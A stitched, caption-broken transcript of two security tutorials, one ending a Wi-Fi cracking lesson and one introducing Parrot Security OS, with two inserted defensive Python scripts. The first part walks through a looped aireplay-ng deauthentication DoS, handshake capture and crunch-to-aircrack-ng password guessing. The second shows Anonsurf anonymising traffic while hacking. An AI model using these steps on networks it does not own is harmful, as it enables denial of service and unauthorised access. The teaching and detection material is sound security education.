Okay. So the information that we need to remember is the BSSID, or rather the MAC ID of the station. Now, you also want your monitoring to be running on the same channel, so that your deauthentication message is being broadcast on the same channel. So we can do that easily by going airmon-ng and saying wlo1, and you can say start on a specified channel. So what we want to be doing is running this on channel 6. Then we want to go and use the third tool of the suite, that is aireplay-ng. Now aireplay-ng is used for broadcasting deauthentication messages and all sorts of stuff. Now you can see all this in the help menu also, and you can do that by typing in --help. If you go down you see that you can send the deauthentication message using the -0 flag, and that's exactly what we're going to do. Then we say zero again, because we want to constantly send a broadcast of the deauthentication. So it's looping, basically, and until and unless we stop the scan, nobody will actually be able to access the Wi-Fi. So it's basically like a small DoS attack. And then we want to specify the BSSID. Okay, so it seems like I forgot the whole -a tag before the BSSID, and that should get it working. Okay, so it seems like I have copied some wrong BSSID, I guess. So let me just go ahead and copy that once properly.

Okay. So now that we have the proper BSSID, as you guys can see, we are running the deauthentication broadcast message on that particular network access card, and now you want to run this for around a couple of minutes so that you become sure that all the devices have disconnected. Now while this is happening, what you're doing is basically sending a DoS attack to that small little Wi-Fi, and you want to catch the handshake that occurs between the devices and the router that they are connected to while reconnecting themselves. Okay. So now that we've let the scan run for a couple of minutes, let us just stop it. Let's stop this other scan too.
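The deauthentication broadcast described above is noisy from the defender's side: a real access point seldom deauthenticates every client at once, and never dozens of times a second, so a wireless intrusion detection sensor on the same channel sees the looped broadcast plainly. As an added example (not code from the course or from the aircrack-ng suite), here is the detection logic run over constructed frame records of the form (timestamp, frame type, subtype, BSSID, destination): 802.11 management frames are type 0, and subtypes 0x0c (deauthentication) and 0x0a (disassociation) are the ones that kick a client off. The access point and client addresses, the 5-second window and the threshold of 10 frames are all assumptions for the demonstration.

```python
"""Detect a deauthentication flood of the kind described above.

Added example; not code from the course or from the aircrack-ng suite. The
frame records are constructed to stand in for what a monitor-mode capture
would yield: (timestamp in seconds, frame type, subtype, BSSID, destination).
"""
from collections import defaultdict, deque

# 802.11 management frames are type 0; these two subtypes kick a client
# off an access point, and beacons are the normal background chatter.
MGMT = 0
BEACON = 0x08
DISASSOC = 0x0a
DEAUTH = 0x0c
BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_sample_frames():
    """Constructed traffic: normal beacons, one isolated deauth, then a flood."""
    ap = "aa:bb:cc:00:00:01"         # hypothetical access point being flooded
    quiet_ap = "aa:bb:cc:00:00:02"   # hypothetical AP that sends one genuine deauth
    client = "de:ad:be:ef:00:01"     # hypothetical client
    frames = [(i * 0.1, MGMT, BEACON, ap, BROADCAST) for i in range(20)]
    frames.append((0.5, MGMT, DEAUTH, quiet_ap, client))
    # 25 broadcast deauths in 2.5 seconds: the looped "-0 0" behaviour seen above
    frames += [(10.0 + i * 0.1, MGMT, DEAUTH, ap, BROADCAST) for i in range(25)]
    return frames


def deauth_counts(frames):
    """Total deauth/disassoc frames per BSSID, a quick first triage number."""
    counts = defaultdict(int)
    for _ts, ftype, subtype, bssid, _dst in frames:
        if ftype == MGMT and subtype in (DEAUTH, DISASSOC):
            counts[bssid] += 1
    return dict(counts)


def detect_deauth_floods(frames, window=5.0, threshold=10):
    """Return {bssid: timestamp} for each BSSID whose deauth/disassoc frames
    exceed `threshold` inside a sliding `window` of seconds, recording the
    first moment the threshold is crossed."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, ftype, subtype, bssid, _dst in sorted(frames, key=lambda f: f[0]):
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) > threshold and bssid not in alerts:
            alerts[bssid] = ts
    return alerts


if __name__ == "__main__":
    frames = build_sample_frames()
    print("deauth frames per BSSID:", deauth_counts(frames))
    for bssid, ts in detect_deauth_floods(frames).items():
        print(f"ALERT: deauth flood against {bssid} at t={ts:.1f}s")
```

The single deauthentication from the second access point never trips the detector; the flood against the first one is reported at the eleventh frame, about one second after it starts. A real sensor would also record the destination, since a broadcast destination on a deauth is itself unusual.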

Now, if I go and list out the files on my desktop, you should see that there's something called testcapture. Now, the test capture is given to us in various formats. We have the capture format, which is just testcapture-01.cap, and then we have the testcapture CSV, and we have a Kismet CSV. So it gives you a bunch of formats to actually run your cracking on. Now if you remember, I had told you all that I have already generated a similar capture at home, basically when I was trying to crack into my own home password, so I will be running the tests, or the cracking procedure, on that file. And that is the last step of this whole procedure. So let me just go ahead and move into that folder. Now as you guys can see out here, if I list down the files, you can see capture-01.cap, capture-01.csv, the Kismet CSV, and the XML. So I was not lying when I said that I have already done this at home. So we are going to run our cracking process on capture-01.cap.

Now let me just tell you guys the password for my home Wi-Fi is sweetship346, so you can say that I know the entire password, but I'm going to act like somebody who only has a general idea of what my password looks like. So let's say I know that my password contains sweetship, but I don't really know the last three numbers or letters, or whatever they may be.
Okay, so we are going to use crunch once again to generate a list of words that might include sweetship346, and let me just open the crunch manual for once. Now if you go down in the crunch manual, what you'll see is the -t. So as you guys can see, there is a pattern that is specified, like some text followed by an @ and then four other @ signs, and all the @ signs will be replaced by a lowercase character. Now you can remove the @ and use a comma, and it will be replaced with an uppercase character, or you can use the percent sign, in which case it would be numbers, or you could use the caret sign, in which case it will insert a symbol. So when you know the length of the password and also a certain degree of a few letters, you can use the -t flag. So that is exactly what we are going to use with crunch out here for this example.

So let me just remind you guys that the password for my home Wi-Fi is sweetship346. Now what we can do is ask crunch to actually generate something that looks like sweetship346. So what I could do is say crunch; so the minimum length is 12, I already know that, and the maximum length is also 12. Now let me just input the pattern. So we put in the pattern after -t. So now I'm going to show you how long it can take. So we are just going to say sweet and then put in some @ signs and then also get it to try and guess the numbers. So after you've put in the pattern, you want to also input which letters and numbers it could be, and I'm just going to input my entire keyboard out here. Now what you want to do is pipe this command through aircrack-ng's cracking procedure. Okay. So now what we want to do is pipe this command to aircrack-ng, and we want to read from the capture file. So what we go is -w and then -, and then the capture file name, so capture-01.cap, and then we also have to specify the ESSID, which is given to the -e flag, and the ESSID for my home Wi-Fi is Nestaway_cc105. So that's exactly what I'm going to type in, and this will start the cracking process on my Wi-Fi from the captured file.

So as you guys can see, this is going to take a long, long, long, long time, and I'm not really actually going to complete it. So in this time I'm actually just going to try and explain why this is not very feasible on a virtual machine. So basically this is not feasible because at this moment my computer is using all four of its cores and all the memory that is possible. So what this means is, on a VirtualBox this is not really possible; your VirtualBox doesn't really have that much power. If you are using a 4-core processor computer, only two of its cores at maximum can actually be allotted to your VirtualBox machine; above that, you can't really give it the entire memory because that will make your computer crash. So if you want to do something like this, it's better that you install Kali Linux as a dual boot or as your own daily driver, and then you can do this. So this is why I have not done this on a virtual machine and instead done it on Deepin Linux, which is my daily driver operating system.

Now as you guys can see, this is constantly trying to actually guess the password by actually going through all the permutations and combinations. That is, basically it's taking in all the words generated from crunch, piping it into the current command, that is the aircrack-ng command, and is comparing everything. So what I'm going to do is, I'm actually going to end this, because this will take a very, very, very long time. And what we're going to do is actually try and shorten the command, or the amount of guessing that we're trying to do. So let me just try and do that. So as you guys can see out here, I have reduced the number of alphabets that might actually be tested. But even in this case, this will take a humongous amount of time, and let me just show that to you. So as you guys can see, the test is running, running, running and running, and there's not really much you can do; you can just let this run, go out for a cup of coffee and then come back, and you might still see that running. It really depends on what the password is and how much time it takes to crack it, and how much processing power you have directly affects how much time this will take. So let me just show you guys that this is taking a bunch of time.

Okay. So now that I have fast-forwarded a lot into the scan, you can see that I have tried almost 2,127,608 keys. So that's more than a million keys; that's 2 million keys that have been tried, and it still hasn't reached 346. So what we're going to do, just to show you for demonstration purposes that this procedure actually works, is let me just shorten the guessing even more. So what we want to do this time is just guess the numbers, so we'll modify our command accordingly. So we just put in sweetship and let the algorithm just guess the 346 part. So we're going to remove the alphabets from the guessing scope also, and as you guys can see, the password is almost immediately guessed, because only 456 keys were tested. And as you guys can see, it shows that the key was found, and it's sweetship346. Now let me also show you that it works with the guessing of letters too, just because I don't think you'd believe that letters are also guessed and not just numbers. So let me make it just guess the p part, that is sweetshi, and then it should guess p and then 346. So let me just show you that, and as you guys can see, it guesses it almost immediately, after just going through 15,000 keys.
Okay, so that brings us to the end of this Wi-Fi cracking tutorial, and also to the end of this video, which was regarding ethical hacking using Kali Linux. I hope you guys had a bunch of fun learning about macchanger, proxychains and a bunch of stuff that we did like Wi-Fi password cracking. I hope you practice these procedures and methodologies that I have taught you only for your own educational purposes, and not use them to harm anybody or do anything harmful with them, because let me just tell you very seriously that you can be prosecuted by the law. So let's end this video on a good note by saying: please practice this for only educational purposes.


If you are a hacker


pentester security researcher

or just another person

who hacks Google in front

of friends to look cool,

then it's likely

that you already know

about some Linux distros,

which are particularly


made for them.

Today.

We're going to explore


one such Linux distro, Parrot

Security OS, one of

the leading Linux distributions

for penetration testing

and ethical hacking.

So let's quickly go
through today's agenda first.

We will Begin by discussing

how Linux distributions are


suitable for ethical hacking

and different type


of Linux distros

that are available


for ethical hacking

and penetration testing.

Then we will begin


with our today's topic

which is parrot security OS


we will discuss
its features its history.

If or not parrot security OS


is suitable for you.

Moving on we will see

how Parrot Security

OS is different from Kali Linux

and then I'll show you

how to install parrot security


OS using VMware software

and finally we'll end


the session by taking

a look at few popular


parrot security OS tools.

So I hope the agenda
is clear to you guys.

Let's get started


then a security

focused operating system is


a hacker's best friend

as it helps a hacker
to detect the weaknesses

in computer systems
or computer networks.

whether you want to pursue


a career in information security

or you are already working


as a security professional

or if you are just interested


in this specific field

for fun, a decent Linux distro

that suits your purpose


is always a must now

if you're wondering

what a Linux distro is,

it is a Linux distribution

that has been curated to perform

security related tasks.

Most of the time a Linux distro will
have a Linux base of the Ubuntu

or Debian flavor and usually

some custom tools pre-installed

in it as well.

As you guys know


Linux is the best choice

for Security Professionals


for obvious reasons.

And hence

most of the distros

are usually built on it.

A Linux distro can help you

in performing analysis,

ethical hacking, penetration

testing, digital forensic tasks

and various other

auditing purposes,

but guys apart

from these distros,

There are other open


source tools as well that you

can bundle and use as


per customer requirements,

but using these distros

has a lot of advantages.

Like, first of all,

they save a lot of time and


effort that you need to spend

when you are dealing


with customer requirements.

Secondly, they help


beginners to easily start

with security testing

without having to get


into the nitty gritties

of operating system.
And lastly the most

popular reason is you have


great pool of distros

that you can choose from most

of the time Kali Linux is


the obvious first choice

of operating system
for every new hacker.

If you ask me why


the obvious answer would be

because Kali Linux has a lot

of cool things; it comes bundled

with a curated collection

of tools. Moreover,

these tools are organized

into an easy-to-navigate menu

and a live boot option.

That's very newbie-friendly,

as in it's very friendly

to new ethical hackers,

but guys Kali Linux is not

the only distribution

which is targeted at pentesters.

There are many exciting


Alternatives that may better

fit your use case.

Anyway, let's begin


our discussion with Kali Linux.

It was developed by
Offensive Security as a rewrite

of BackTrack. Kali Linux distro

thus tops the list

of best operating systems

for ethical hacking purposes.

And then there is


parrot security OS

which is our today's discussion.


It is a mixture
of Frozenbox operating system

and Kali Linux.

It's the second most popular

operating system for ethical hacking

and penetration testing as well,

and then you have

BackBox Linux.

It's an Ubuntu-based operating

system with its focus mainly

on security assessment
and penetration testing.

Then you have Pentoo,

an excellent

hacking operating system

with a wide variety of tools

that you can choose from. Apart

from this you have DEFT Linux,

BlackArch Linux, Cyborg, BackTrack

and many others.

But as for today's session,

we will be discussing
about parrot operating system

Parrot OS is the second most

popular Linux distro for ethical

hacking after Kali Linux.

It is a comprehensive
portable security lab

that you can use for cloud

penetration testing, computer

forensics, reverse engineering,

hacking, cryptography

and many other

security purposes.

Now a little bit about

its history: the first release

of Parrot OS appeared
on April 10, 2013.

Originally it was developed

as part of Frozenbox.

Now it has grown


to include a community

of Open Source developers

Professional Security Experts


Advocates of digital rights

and Linux enthusiasts


from all over the world.

Well, compared to others,

Parrot Security OS promises

a lightweight operating system

and it's highly efficient. Along

with its plethora

of recognized tools you also

get the opportunity to work

and surf anonymously,

which is like a granted wish

to an ethical hacker

or any penetration tester.

We'll learn about other features

in the later part

of the session.

So moving on since its release


in 2013 parrot has grown rapidly

and currently offers

many different flavors targeted


towards different use cases.

For example,

like I said,
we have Parrot Security.

It's the original Parrot OS

and is designed
with penetration testing,

forensics, hacking, development

and privacy in mind. Then

you also have Parrot Home,

which is targeted
towards desktop users.

It strips out
the penetration testing packages

and presents a nicely

configured Debian environment.

Then you have Parrot

Air; it's focused

on wireless penetration
testing. Parrot Studio,

it's designed with

multimedia creation in mind.

Then you have Parrot

Cloud, the most popular;

it targets server applications,

giving the user access

to the full suite of penetration

testing tools included

in Parrot Security,

but it doesn't have

a graphical front end

like we do in Parrot
Security. Moving on,

we also have Parrot IoT.

It's designed for low

resource devices such as

Orange Pi, Raspberry Pi

and you have Pine64

and many others.

So it's true

that Parrot Security OS

doesn't have a large community

of users behind it
as Kali Linux does,

but the distribution

has been gaining a lot

of momentum in recent years.

So things could be
very different just a year

or two from now.

So let me convince you more.

Let's just discuss the features

of Parrot Security OS.

Let's start with

the system requirements.

It's based on Debian 9.

It runs on a custom

hardened Linux 4.5 kernel,

uses a MATE desktop

and LightDM display manager.

It requires a minimum
of 256 MB RAM

and works with both 32

and 64-bit systems as well as

an ARM-compatible version. Apart

from this, Parrot OS can also

be installed on cloud

and updated to perform

cloud-based security.

So basically it
runs on Debian 9.

It is compatible with 32
as well as 64-bit systems

and ARM systems as well

and it requires a minimum

of 256 MB RAM.

So those are the system

requirements. Moving on, it

also supports anonymity.

It offers a tool called Anonsurf,

including anonymization

of the entire operating system.

It comes with custom-built

anti-forensic tools,
interfaces for GPG and cryptsetup.

Originally it also

supports encryption tools

such as LUKS, TrueCrypt

and VeraCrypt and many others.

Moving on, it also supports

a forensic boot option

to shut off automounts

plus many more. It embraces the

Falcon programming language,

multiple compilers, debuggers

and beyond. It also

provides full support

for developing frameworks

for embedded systems

and many other amazing features.

So guys, these are

a few features of Parrot OS.

So basically Parrot
operating system supports

anonymity; it offers different

kinds of cryptography tools.

It also supports forensic mode


and it also provides opportunity

to develop Frameworks
for embedded systems

and many other amazing


features. Moving on,

before you go ahead and use

Parrot OS there are

some important considerations

that you need to take

a look at. First

of all, Parrot OS provides

general purpose features,

like any other normal

operating system does,

but at its core it


is still tuned for security

and forensics.

Now, let's see


how different parrot OS is

from other distributions.

Parrot is different from


a general-purpose distribution

because it does not try


to hide its features.

For example, there is a tool


called parrot update reminder.

It's simple yet powerful program


using this program.

You can check for system


upgrades once a week,

but instead of hiding

the upgrade process behind it,

like any

other operating system does,

it shows the user

the full update process

from the APT output.

So you can see the upgrade


process going on.

Secondly parrot was designed

to be a very comfortable
environment for Security Experts
and researchers.

It includes many basic


programs for daily use

which other penetration

testing distributions usually

exclude. Parrot Security includes

its own sandbox system.

I mean, it provides a secure

distribution; user applications

in Parrot are protected

to limit the damage in case

the system
is compromised at any time.

So this way no harm is caused.

So like we discussed earlier

it also supports digital

forensics. Digital forensics

experts need an environment

that does not

compromise their proof.

So Parrot comes
with automount functions

which are disabled by default

to allow forensic

acquisitions to perform

in a very safe way.

So before you go ahead

and choose any


of these operating system,

make sure you check


out their features.

The services they offer


and make sure that

if they are suitable


for the task,

which you want to perform


but as for Parrot OS,

these are its features


we discussed earlier

and these are the certain points

that you should take


into consideration

before you go ahead and use it.

Now if you're wondering who

the parrot security


is made for well,

it's made for Security


Experts digital forensics

experts engineering
and IIT students researchers,

you have journalists and


activists as well in the list

and you have the newbie


hackers police officers

and special security.

Institutions.

So basically if you ask me


it's suitable for a student

or the entry level


Security Experts as well.

So first, I'll show you

how to install Parrot

Security OS on VMware.

So basically when it
comes to installation,

you have two options,

you can install


parrot security OS

alongside your operating system


using dual boot option

or you can install it using any


of these virtualization software

like virtual box or VMware.

As for today's session,


I'll show you
how to install it using VMware.

So let's get started


with our installation.

So let's just search

for Parrot Security OS

and it's most probably the first

link that you find on the net.

This is Parrot Security
OS official website,

as you can see,

there's a little bit


about its history.

Its features.

It says it's based on Debian.

It's designed for security


development and privacy in mind.

It also includes
a laboratory for security

and digital forensics experts


along with that it also focuses

if you want to develop


your own software

and all that, and its

project goals are mostly security,

privacy and development.

This is the thing which you should

consider important: development,

unlike other operating

systems. Its features:

it's secure, lightweight

when compared to Kali Linux

or any other operating systems,

and it's open source.

So go ahead and explore it.

So as for the download options,

you can go for the

security edition here,

and in the download menu here you

can see other options as well.

It says home edition, security

and other builds; we discussed a few

of the flavors of Parrot

OS earlier.

We discussed Parrot Home,

Parrot Air, Parrot Studio

and all that anyway.

If you're concerned
with Parrot Security, 4.5.1

is the current

version that's running.

So you have two options


here to download.

First of all take


a look at the size.

It's 3.7 GB and 5.9 GB.

So make sure whichever

you want you are downloading it

depending on your operating

system requirements.

And as you can see,

this is a live/installer ISO

and this is
a virtual appliance.

You can choose any of these

if download is taking
a little longer

than you expected.

Maybe you can go


for mirrors or a torrent.

So I've already installed it.

I'm not doing it; I have the ISO

file as well as the OVF

format installed as well.
Next thing we need
to do is install VMware.

So VMware, VMware
Workstation Pro.

So you have
a download option here.

You can go ahead

and download it. You have,

for the free option, you

also have VMware Player.

I guess wait here.

I got the link, sorry

about that. Here in the downloads

you can go
for Workstation Pro

or you can also go

for Workstation Player

or any of these,

whichever suits you.

Download it.

It's going to take for a while.

And then all you have


to do is install click

on next and finish


the installation process.

So before you start


your virtual machine,

make sure you have


your parrot OS image ISO file

or OVF format
which ever is of your choice.

And then here we go


VMware Workstation homepage.

Yeah, as you can see

I already have a Parrot

OS operating system installed,

a virtual machine installed

here. This is it; I have installed
it using the ISO file.

It's very easy.

I'll show you how to do it.

But if you have ovf format,

all you have to do is click


on this file menu.

Open and as you can see,

I have a Parrot OVF over here


and click and import it.

That's all click select it


and click on open.

So I'm not going to show you


how to do that.

So it's very
straightforward process.

That's it.

This is my ISO file.

Let me show it to you again


how to install it.

Anyway, open file,

or you can just go for create

a new virtual machine.

Yeah, click on next

and attach the ISO file; browse.

I have it in my
local disk here.

I have Parrot Security;

open, next. Select Linux, Debian

latest version,

which is 64 bit, and click

on next. Give any suitable name

for your virtual machine.

Let's say Parrot

Security

OS and click on next.

Let's assign about


40 GB it again.

Depends on what you want to do.

If you're doing heavy tasks.

Maybe you can assign more disk.

So it asks whether to store
the virtual disk as a single file

or split into multiple files.

I'm going to choose single file


click on next and you

You can always go ahead

and make these customize hardware

settings earlier or later,

but you can do it now as well.

Customize hardware.

I have NAT connection as

for network adapter;

memory, well,

let's just say 2 GB and now

yeah, we set processors.

I'm just assigning one

for now. Cool, and close.

You can see the changes

which are made


are displayed here.

Once you're satisfied

with your settings with that


you made click on finish.

You're good to go; your

system is being displayed

here. So like I said,

you can always make

settings later on.

You have the edit virtual

machine settings option here.

Just click on this.


Let me maximize
the screen for you guys.

So as you can see the parrot


security ISO is very flexible.

There are quite a few options


you have live mode.

You have terminal mode


you have Ram mode.

So basically live mode is just


a standard live USB boot option

just like you can see

while you're installing


Kali Linux suppose.

If you don't know


how to install Kali Linux,

there's a video on how to


install it as well by Edureka.

You can refer to that

in the ethical hacking playlist.

Okay, so coming back.

Sorry about that. You

have a persistence

mode, encrypted persistence,

forensics mode

and all that. Terminal mode,

As you can see is


out of the live boot option.

But without graphical user


interface the most popular one

among new hackers,

or if you're the first time


user is install option

with a graphical user interface.

So it's almost familiar


with Kali Linux users.

If you want to get a feel


of parrot security
and all its features,

maybe you can give


for live mode,

but if you want to get just

started then you can always


go for install mode.

I'm going to click on that


and click on standard install.

So it's mounting all


the installation tools

and all that.

So once the machine is booted


up you'll be asked to select

your preferred language


the boot menu, select

the graphical installer options

and click on let's say English

and United States


American English.

So then the loader

will automatically install


some additional components

and configure your network


related settings.

It might take a while.

So basically then
the installer should prompt

you for a host name


and the root password.

Let's give some root


password give the password

of your choice reenter


the password for verification.

And now it's gonna ask you

to set up a user apart


from the root user.

So let's just say


test user continue.

I'm going to keep it


as tests continue

and choose a password


for the new user

which is different

from the root user password


that you'll have to remember.

So just give this new user

a password, continue,
re-enter the password.

Okay.

Let me just go back


and my mistake.

Let me try it again.

Select your time zone.

So basically after
you've set your password,

it's asking you


for the time zone.

Let's say central eastern.

So now the installer


will provide you four choices

about the partition of the disk.

The easiest option

for you is to use guided use


entire disk option

which the first option here


experienced users can always go

for manual partitioning method

for more granular


configuration options.

So yeah, guided partitioning.

I'm going to select


that guide use entire disk.

This is the disc


we're going to store

so it's asking

if you want to store all files


in one partition or different.

Let's just say all files in one

partition and hit on continue.

So now we will have


to confirm all the changes

to be made to the disk


on the host machine be aware

that continuing will erase


the data on the disk.

So after that you can just click


on finish partitioning

and writing disk thing.

It's asking if you want


to write the changes

to the disk, obviously.

Yes.

So click.

Yes.

So once aren't confirming


the partition changes

the installer will run


through the process

of installing the files let it


install the system automatically

this may take a while.

So I'm we'll meet you guys


once installation is done.

So once installation
is done It'll ask you

if you want to install


the GRUB boot loader

on your hard disk; just say yes

and click on enter device


manually or sorry
just click the device,

which is already there go back.

The installation process


is now almost complete.

So guys the
installation is done.

Once the installation is done.

You can see the machine boots

you into the MATE desktop

environment, and if you

have chosen the install

option you will be presented

with a LightDM login screen.

So basically you'll have

to enter the password

which is set up

for the test user earlier.

Not the root password.

Please do remember that.

I'm sure you remember


setting up a password

for the user right


that password and login.

So here we go.

So guys here we are


as you can see

the machine boots you into


the mate desktop environment.

Let me pronounce it
MATE; you can call it

whatever you want mate


or mate desktop environment.

So as you can see,

it's very good looking apart

from that parrot Security


will automatically detect

when updates are available

and prompt you to update


the system as soon as you

install it here.

It's not showing it to me


because I've already updated it,

but Otherwise, all you can do


is just go to the terminal here.

You can see terminal option


here right go to terminal there

and just say sudo apt-get update


It'll ask me for the password.

How did it go?

Maybe it's a matter of having updated

in another virtual machine.

Anyway, I installed
the other one as well.

Maybe it's in that anyway,


I'll update for you.

So let me just minimize this


while it's updating.

Let's go ahead
and do other things.

So it's almost done I guess.

Yeah, as you can see


it's almost updated

and it says 116 packages

more can be upgraded; run

apt list --upgradable to see them.

If you want to see

which of those packages

they are, you have to just list out

those using the apt command.

I'm not showing

that to you guys.

So anyway, when you're getting

started, first make sure your system
always stays updated.

Okay, let's go back


to exploring Parrot OS. So

as you can see


system is laid out

in a very straightforward manner

with a collection of tools that


you might be familiar with.

If you're using Kali Linux

before the menu system is


almost similar to Kali Linux

and it's very easy to navigate


the real differences

that parrot security is meant


to be used as a daily driver as

in your regular operating system

through the other things


as well to prove

that you can see you have sound

and video options here, a lot

of programming language options

as well; you have system tools

and you have graphics included;

you have office applications

and software; you have Base,

you have Math, Writer

and Planner, just like any other

normal operating system.

So while you can use Kali Linux

as a desktop workstation,

it really is a penetration
testing distribution first.

I'm talking about Kali Linux.

So with Kali you need

to build the system

towards being a daily use system,

as in you start using
Kali Linux you need to modify

or you need to customize it in

Your way that you make


it more plausible or easy

for you to use


for the daily purposes,

but that's not the case with


parrot security OS its interface

and everything is so good.

It almost appears
like a normal operating system

and it is like a very


normal operating system.

So you have
your penetration testing tools

which are there and along

with that you have

your day-to-day applications

also there in this. Now talking

about the system requirements,

the default Parrot

Security install uses

about 313 MB of RAM.

So as you can see here you

can see this small little bar.

It's like a task manager,

which you can find it in


your windows can click on that.

It will show you all


the progress that's going on.

First of all,

it says the Parrot GNU/

Linux system, the release

and the kernel,

all the information

about your ISO file,
and you have the MATE
desktop environment here,

in the hardware,

which is this, and the processor;

it's based on available space

and all that when you


click on the processes,

it shows all the processor


which are currently

running sleeping just


like your task manager.

And your Windows


operating system.

So yeah, like I said,

it requires about 213 MB


of ram approximately around that

but of course,

this is only system


related process running

when compared to Kali Linux.

It's very lightweight


a Kali Linux install requires

about 604 MB of RAM

and that too only with system


related process running.

So, like I said,


it's a very lightweight system.

So yeah, the bar is

a task manager it
lists all the processes

that are running and all that


you obviously have a terminal

which I showed earlier


the Cool thing with terminal is

that it goes
with their interface.

Other than that.


It's pretty much
like any other normal terminal.

And then there is the appearance

of the interface.

I mean my first reaction


when I saw it was wow, amazing,

right when compared


to the plain Kali Linux.

So yeah, you get


to use cool collection

of wallpapers as well.

You have change


desktop background here you

have fonts interface and see


you have quite a lot

of collection of wallpapers

and you can go ahead and add


your Customs as well.

That's all about the interface.

And like I said,

it's like any other


normal operating system.

So it comes with a lot


of programming languages

and a bunch of text editors.

You also have IDs as well.

It uses Pluma as
your default text editor.

So that's it

when talking about the normal


operating system. Now talk

about the performance;

almost all of us know

that Kali Linux is a bit laggy

and when you run it

on a low-end system,

sometimes it's like a nightmare

when you have a
brute force attack going on

in the background

and you're doing something else.

It's going to be, I'd say, stuck

or it's very slow, but in Parrot

it's very lightweight

and doesn't lag much.

As you can see,

it's smooth. Now talk

about hardware requirements.

Pretty much both Kali Linux

and your Parrot require

high end hardware,

but Parrot needs

lower specification hardware

as compared to Kali.

So if I have to conclude

in one word, Parrot is

a good-looking distro.

It's very lightweight,

it's resource friendly,

and if you want to know

how much resources it is

consuming and all

that, you can always go

and click on the little bar,

which is available there.

Click on the resources.

You can see the CPU history,

memory, network history,

file systems and all that.

So basically it's
a good-looking distro

lightweight resource friendly.


All these features apart, Parrot

Security OS has a pretty good

collection of features as well,

which we discussed earlier.

It comes with a whole

lot of tools,

but if you see the sections,

there are a lot of other things


which are not in Kali Linux.

So the most important

tool here is

that in Kali Linux, suppose

you want to stay private

when you're doing hacking

or any other stuff.

You have to install

Anonsurf or Tor

and then enable them,

or proxychains.

You also have the option

of proxychains to keep yourself

anonymous on the system

while you're doing hacking

or pen testing or anything,

but with Parrot OS you already

have Anonsurf pre-installed.

All you have to do is click


on the start button.

So let me show you


how to stay Anonymous.

So this is one
of the best features

in Parrot Security OS:

it has proxychains

as well as Anonsurf to make

yourself anonymous,

so you can go for this Anonsurf

and click on Anonsurf

start. But before that,

you can check the IP

of your system.

So it says 1.65 1.73

something; just remember

it, you don't have to note

it down anywhere.

Well, no, 65 1 76 now. Now

if I go and enable
this, first of all it'll ask you

for the administration

password; give that. Okay.

So basically once you

enter the password,

it'll ask you

if you want Anonsurf

to kill the dangerous processes

that can de-anonymize

you, clear cache files

or modify your iptables rules

and all that.

It'll ask you

if you want to do
that; just say yes.
So basically as
soon as you click on yes,

as you can see in the notifications

here, the tool will attempt

to kill dangerous processes

that can de-anonymize you

anytime. It will clear

your cache files.

It will modify
your iptables, modify your

config file, disable your IPv6

and only allow you

outbound traffic through Tor.

As you can see, Tor

is running, started for you.

Imagine doing all


this stuff by yourself.

If you don't have

Anonsurf, like in Kali Linux,

This would be quite a bit


of effort manually,

but with the script


already present here,

it's just a click away.
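Anonsurf, as described above, rewrites the iptables rules so that only the proxy daemon's traffic may leave the host, and disables IPv6. A defender, or anyone who wants to confirm the script actually did what the notification claims, should check the resulting state rather than trust the click. The Python below is an added example, not Anonsurf's code or anything shipped with Parrot: it audits a saved firewall dump for ACCEPT rules in the OUTPUT chain that would let traffic bypass the proxy daemon, and checks the IPv6 sysctl. The two dumps and the proxy UID 106 are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed `iptables-save` style dumps (not captured from Parrot); the
# proxy daemon is assumed to run as UID 106 on this host.
LOCKED_DOWN = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m owner --uid-owner 106 -j ACCEPT
-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
COMMIT
"""

LEAKY = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A OUTPUT -m owner --uid-owner 106 -j ACCEPT
-A OUTPUT -p udp --dport 53 -j ACCEPT
COMMIT
"""

# Constructed output of `sysctl net.ipv6.conf.all.disable_ipv6`.
SYSCTL_OFF = "net.ipv6.conf.all.disable_ipv6 = 1"
SYSCTL_ON = "net.ipv6.conf.all.disable_ipv6 = 0"


def parse_filter_table(dump: str) -> Tuple[Dict[str, str], List[str]]:
    """Return chain policies and the OUTPUT rules of the *filter table."""
    policies: Dict[str, str] = {}
    output_rules: List[str] = []
    in_filter = False
    for line in dump.splitlines():
        if line.startswith("*"):                 # table header: *filter, *nat, ...
            in_filter = line.strip() == "*filter"
        elif in_filter and line.startswith(":"):
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
        elif in_filter and line.startswith("-A OUTPUT "):
            output_rules.append(line[len("-A OUTPUT "):].strip())
    return policies, output_rules


def audit_output_lockdown(dump: str, proxy_uid: int) -> List[str]:
    """List every way the OUTPUT chain could let traffic bypass the proxy."""
    policies, rules = parse_filter_table(dump)
    findings = []
    if policies.get("OUTPUT") != "DROP":
        findings.append(f"OUTPUT policy is {policies.get('OUTPUT')}, not DROP")
    for rule in rules:
        if not rule.endswith("-j ACCEPT"):
            continue                                  # not a permit rule
        if "-o lo " in rule:
            continue                                  # loopback only
        uid = re.search(r"--uid-owner (\d+)", rule)
        if uid and int(uid.group(1)) == proxy_uid:
            continue                                  # the proxy daemon itself
        if "--state ESTABLISHED,RELATED" in rule:
            continue                                  # replies to flows already allowed
        findings.append(f"ACCEPT rule bypasses the proxy: {rule}")
    return findings


def ipv6_disabled(sysctl_line: str) -> bool:
    """True when net.ipv6.conf.all.disable_ipv6 reports 1."""
    key, _, value = sysctl_line.partition("=")
    return key.strip() == "net.ipv6.conf.all.disable_ipv6" and value.strip() == "1"


if __name__ == "__main__":
    for name, dump in (("locked down", LOCKED_DOWN), ("leaky", LEAKY)):
        print(name, audit_output_lockdown(dump, 106) or ["no findings"])
    print("IPv6 disabled:", ipv6_disabled(SYSCTL_OFF))
```

On a live host you would feed it the real output of `iptables-save` and `sysctl net.ipv6.conf.all.disable_ipv6`, and the UID of the daemon that is supposed to own all outbound traffic; a non-empty findings list means the "anonymous mode" has a hole the notification did not mention, the plain-DNS rule in the leaky dump being the classic one.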

So Parrot Security
also includes a similar script

for I2P as well. Apart from that,

